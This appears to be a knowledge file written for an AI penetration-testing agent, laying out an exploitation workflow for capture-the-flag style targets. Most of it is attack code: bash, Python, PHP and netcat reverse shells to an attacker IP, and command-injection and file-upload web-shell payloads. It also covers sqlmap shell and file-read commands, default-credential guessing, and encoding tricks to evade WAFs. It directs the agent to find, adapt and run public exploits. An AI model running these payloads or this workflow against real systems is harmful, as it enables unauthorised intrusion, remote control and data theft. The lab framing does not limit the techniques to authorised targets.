exploitation-knowledge

# Exploitation Knowledge Base

## Purpose
This knowledge base provides comprehensive exploitation methodologies and techniques. It covers converting discovered vulnerabilities into actual access, finding and adapting exploits, working in non-interactive environments, establishing stable shells, and capturing the user flag.

## Core Topics Covered

1. **Exploit Discovery**: Finding relevant exploits for discovered services
2. **Exploit Adaptation**: Modifying exploits to work in the target environment
3. **Initial Access**: Gaining command execution or shell access
4. **Shell Stabilization**: Upgrading to stable, usable shells
5. **User Flag Capture**: Locating and reading user.txt

## Tools Available

### Exploit Databases
- `searchsploit` - Local exploit-db search
- `msfconsole` - Metasploit framework
- Manual search: ExploitDB, GitHub, security advisories

### Shell Tools
- Reverse shells: bash, python, php, nc
- Web shells: PHP, ASP, JSP
- `rlwrap nc` - Stabilize shells

### Web Exploitation
- `sqlmap` - SQL injection
- `curl` - Manual web testing
- File upload bypass techniques
- Command injection testing

### Credential Testing
- `hydra` - Service brute force (limited use)
- `ssh`/`ftp`/`mysql` - Test discovered credentials

## Exploitation Workflow

### Phase 1: Multi-Source Exploit Discovery

**Core Principle:** Use multiple exploit sources in parallel - never rely on a single source.

**Layered Exploit Search:**

```bash
# Layer 1: Local database (fastest)
searchsploit "service version"
searchsploit CVE-YYYY-XXXXX
# If found → proceed to analysis
# If not found → immediately try Layer 2

# Layer 2: Metasploit framework
msfconsole -q -x "search type:exploit name:service_name; exit"
# If found → test with msfconsole
# If not found → immediately try Layer 3

# Layer 3: Online sources (GitHub, Google)
# GitHub API search (automated)
curl -s "https://api.github.com/search/repositories?q=CVE-YYYY-XXXXX+exploit" | jq -r '.items[].html_url'

# Google search (manual if needed)
# Search: "CVE-YYYY-XXXXX exploit poc github"
# Search: "service_name version exploit"

# Layer 4: Adapt or create custom exploit
# Based on vulnerability description/advisory
# Modify existing PoC for your environment
```

**Critical Rules:**
1. **Try all layers** - Don't stop at Layer 1 failure
2. **Parallel search** - If time allows, search multiple sources simultaneously
3. **Cross-validate** - If multiple exploits exist, try most reliable/recent first
4. **Track sources** - Record which source worked in `successful_paths`

### Phase 2: Exploit Analysis

Before running:
1. **Read the exploit code** - understand what it does
2. **Check requirements** - needed libraries, credentials
3. **Identify target parameters** - IP, port, payload location
4. **Plan adaptation** - what needs to be modified

### Phase 3: Exploit Adaptation

Common modifications needed:

#### A. Python Exploits
```python
# Original (interactive)
import sys
target = sys.argv[1]
shell = raw_input("Enter command: ")

# Adapted (non-interactive)
target = "10.10.10.1"
shell = "/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
```

#### B. Metasploit Exploits
```bash
# Use non-interactive mode
msfconsole -q -x "use exploit/linux/http/webmin_backdoor; set RHOSTS 10.10.10.1; set LHOST YOUR_IP; run; exit"
```

#### C. Reverse Shell Payloads
```bash
# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# PHP reverse shell (for uploads)
<?php system("bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"); ?>

# NC reverse shell
nc YOUR_IP 4444 -e /bin/bash
# Or if -e not available:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc YOUR_IP 4444 >/tmp/f
```

### Phase 4: Listener Setup

Always start listener before triggering exploit:

```bash
# Simple listener
nc -lvnp 4444

# Stabilized listener with rlwrap
rlwrap nc -lvnp 4444
```

### Phase 5: Execution

Execute exploit and verify success:

```bash
# Run exploit
python3 exploit.py

# If successful, you should see connection in listener
# Test with:
id
whoami
pwd
```

### Phase 6: Shell Stabilization

Once you have basic shell:

```bash
# Upgrade to TTY shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Then press Ctrl+Z
stty raw -echo; fg
export TERM=xterm
```

## Common Attack Vectors

### 1. File Upload Vulnerabilities

```bash
# Test simple upload
curl -F "file=@shell.php" http://TARGET/upload.php

# Bypass restrictions
# Try: shell.php.jpg, shell.phtml, shell.php5, shell.PhP

# Find uploaded file
gobuster dir -u http://TARGET/uploads -x php,phtml

# Trigger shell
curl http://TARGET/uploads/shell.php?cmd=id
```

### 2. SQL Injection

```bash
# Test for SQLi
sqlmap -u "http://TARGET/page.php?id=1" --batch --level=5 --risk=3

# If found, try to get shell
sqlmap -u "http://TARGET/page.php?id=1" --os-shell

# Or read files
sqlmap -u "http://TARGET/page.php?id=1" --file-read=/etc/passwd
```

### 3. Command Injection

```bash
# Test common injection points
curl "http://TARGET/ping.php?ip=127.0.0.1;id"
curl "http://TARGET/ping.php?ip=127.0.0.1|whoami"
curl "http://TARGET/ping.php?ip=127.0.0.1`whoami`"

# Get reverse shell
curl "http://TARGET/ping.php?ip=;bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
```

### 4. Public Exploits

```bash
# If you find CVE-2021-XXXX is applicable
# Search for PoC
searchsploit CVE-2021-XXXX
# Or check GitHub
curl -s "https://api.github.com/search/repositories?q=CVE-2021-XXXX" | jq -r '.items[].html_url'

# Download and adapt
wget https://raw.githubusercontent.com/user/repo/exploit.py
# Modify target IP, ports, payload
# Run
python3 exploit.py
```

### 5. Default Credentials

Test these FIRST before complex exploits:

```bash
# SSH
ssh admin@TARGET  # Try: admin/admin, root/root, root/toor

# FTP
ftp TARGET  # Try: anonymous/anonymous, admin/admin

# MySQL
mysql -h TARGET -u root -p  # Try: root/'', root/root

# Web Admin Panels
# Try: admin/admin, admin/password, admin/admin123
```

## Environment Detection and Payload Adaptation

**Core Principle:** Always probe environment before choosing exploitation method.

### Pre-Exploitation Environment Check

**Check your attacking machine:**
```bash
# Check critical tools and versions
java -version 2>&1 | head -1       # For JNDI, deserialization exploits
python3 --version                  # For exploit scripts
gcc --version                      # For compiling exploits
which nc netcat ncat               # For reverse shells

# Record environment limitations
# Example: If Java > 8, JNDI injection will be blocked
# Example: If no gcc, can't compile C exploits → need precompiled or script-based
```

**Check target environment (after gaining RCE):**
```bash
# Via webshell or command injection, test what's available:
which nc python python3 php perl bash sh curl wget

# Test specific versions if exploit requires them
python --version
php --version

# Check writable directories
ls -la /tmp /dev/shm /var/tmp

# Check for filtering/WAF
# Try: echo test
# Try: cat /etc/passwd
# If blocked, try base64 encoding or other bypass
```

### Adaptive Payload Selection

**Decision Tree for Reverse Shells:**

```
1. Do we have RCE?
   └─ Yes → Proceed to step 2
   └─ No → Get RCE first (file upload, SQLi, etc.)

2. Check target environment
   └─ nc available? → Use nc reverse shell
   └─ python available? → Use python reverse shell
   └─ php available? (web server) → Use PHP reverse shell
   └─ bash available? → Use bash /dev/tcp method
   └─ None? → Upload binary or use alternative method

3. Test for filtering
   └─ Try basic command: echo test
   └─ If special chars blocked (/, &, >, |) → Use encoding:
      - Base64: echo BASE64 | base64 -d | bash
      - Hex encoding
      - URL encoding
   └─ If commands filtered by keyword → Try alternatives:
      - cat → head, tail, nl, more, less
      - nc → /dev/tcp, telnet, socat
```

**Example Adaptive Flow:**
```bash
# Step 1: Gained RCE via file upload, test environment
curl "http://TARGET/shell.php?cmd=which nc"
# Response: empty (nc not available)

# Step 2: Try python
curl "http://TARGET/shell.php?cmd=which python3"
# Response: /usr/bin/python3 (available!)

# Step 3: Use python reverse shell
curl "http://TARGET/shell.php?cmd=python3 -c 'import socket,subprocess...'"

# If that fails with error, diagnose:
# - Syntax error? → Check for character filtering
# - No response? → May be WAF blocking
# → Try base64 encoded version
```

### Failure Diagnosis for Exploits

**When exploit fails, systematically diagnose:**

```bash
# Type 1: No response at all
Possible causes:
- Firewall blocking
- Wrong target IP/port
- Service actually not vulnerable
Action: Verify target is reachable, try different port, re-check vulnerability

# Type 2: Error message returned
Possible causes:
- Missing dependency (library, tool)
- Wrong syntax for target environment
- Version mismatch
Action: Read error carefully, install missing deps, adapt exploit code

# Type 3: Exploit runs but no shell
Possible causes:
- Payload blocked by filtering
- Target missing required tool (nc, python)
- Firewall blocking outbound connections
Action: Try different payload encoding, use different shell method, test with simple command first

# Type 4: Tool-specific failure (e.g., Metasploit fails)
Possible causes:
- Bug in Metasploit module
- Configuration issue
Action: Try alternative exploit source (GitHub, manual PoC), check module options
```

**Record diagnosis in state:**
```bash
jq '.failed_attempts += [{
  "exploit": "CVE-2021-12345",
  "tool": "metasploit",
  "failure_type": "no shell received",
  "diagnosis": "target missing nc, switched to python payload",
  "resolution": "used GitHub PoC with python reverse shell - success"
}]' .pentest-state.json
```

## Handling Non-Interactive Shells

Since you're in CLI-only environment:

### Execute Commands Without TTY
```bash
# Instead of interactive shell, use command execution
curl http://TARGET/shell.php?cmd=cat+/etc/passwd

# Chain commands
curl http://TARGET/shell.php?cmd=cd+/home;ls+-la

# Use semicolons
curl http://TARGET/shell.php?cmd=id;whoami;pwd
```

### Background Reverse Shells
```bash
# Start listener in background
nc -lvnp 4444 > shell-output.txt 2>&1 &

# Trigger exploit
python3 exploit.py

# Check output
cat shell-output.txt

# Send commands via named pipe
mkfifo /tmp/pipe
nc YOUR_IP 4444 < /tmp/pipe | /bin/bash > /tmp/pipe 2>&1 &
```

## User Flag Capture

Once you have command execution:

### 1. Locate User Flag
```bash
# Search for user.txt
find / -name "user.txt" 2>/dev/null
find /home -name "user.txt" 2>/dev/null
find /home -name "*.txt" 2>/dev/null

# Common locations
cat /home/*/user.txt
cat /home/user/user.txt
```

### 2. Read and Verify
```bash
# Read flag
cat /home/username/user.txt

# Verify format (should be 32-char hex)
cat /home/username/user.txt | wc -c  # Should be 33 (32 + newline)
```

### 3. Update State
```bash
# Save to state file
USER_FLAG=$(cat /home/username/user.txt)
jq --arg flag "$USER_FLAG" '.flags.user = $flag' .pentest-state.json > tmp.json && mv tmp.json .pentest-state.json
```

## Troubleshooting Failed Exploits

### Common Issues

1. **"Connection refused"**
   - Check listener is running: `netstat -tlnp | grep 4444`
   - Verify firewall allows connections
   - Try different port

2. **"Module not found" (Python)**
   - Install: `pip3 install requests pycrypto`
   - Or adapt code to remove dependency

3. **"Permission denied"**
   - Exploit may need root privileges
   - Try different vulnerability

4. **"Exploit works but no shell"**
   - Check payload syntax
   - Try different reverse shell method
   - Verify target has bash/python/nc

5. **"Timeout" or "No response"**
   - Target may have WAF/IDS
   - Try encoding payload
   - Use slower, stealthier approach

## Decision Tree

```
Found Vulnerability
│
├─ Is there a public exploit?
│  ├─ Yes → Search searchsploit/GitHub
│  │       → Adapt and run
│  └─ No → Can you write custom exploit?
│          → Develop PoC
│
├─ Initial Access Gained?
│  ├─ Yes → Capture user flag
│  │       → Proceed to privilege escalation
│  └─ No → Try alternative vector
│          → Review reconnaissance data
│          → Attempt different service
│
└─ Stuck after 3 attempts?
   → Re-run reconnaissance
   → Look for overlooked services
   → Check for misconfigurations
```

## Output Format

After successful exploitation:

```json
{
  "status": "user_access_gained",
  "method": "File upload RCE via /uploads",
  "access_level": "www-data",
  "shell_type": "non-interactive webshell",
  "user_flag": "a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6",
  "credentials_found": [],
  "next_steps": "Privilege escalation required for root flag"
}
```

## Success Criteria

Success criteria:
1. ✅ Command execution achieved on target
2. ✅ User flag located and read
3. ✅ Flag is 32-character hexadecimal string
4. ✅ Access documented in state file
5. ✅ Ready to proceed to privilege escalation phase

## Key Principles

1. **Adapt exploits** - public exploits rarely work as-is
2. **Handle non-interactive** - CLI-only environment requires creativity
3. **Verify success** - always test access with `id`, `whoami`
4. **Capture flag** - don't proceed without user.txt content
5. **Document method** - save successful path for future reference

## Remember

- Try simple before complex (default creds before 0-days)
- Read exploit code before running (understand what it does)
- Non-interactive shells require different commands
- User flag MUST be captured before moving to privesc
- If stuck, revisit reconnaissance for missed vectors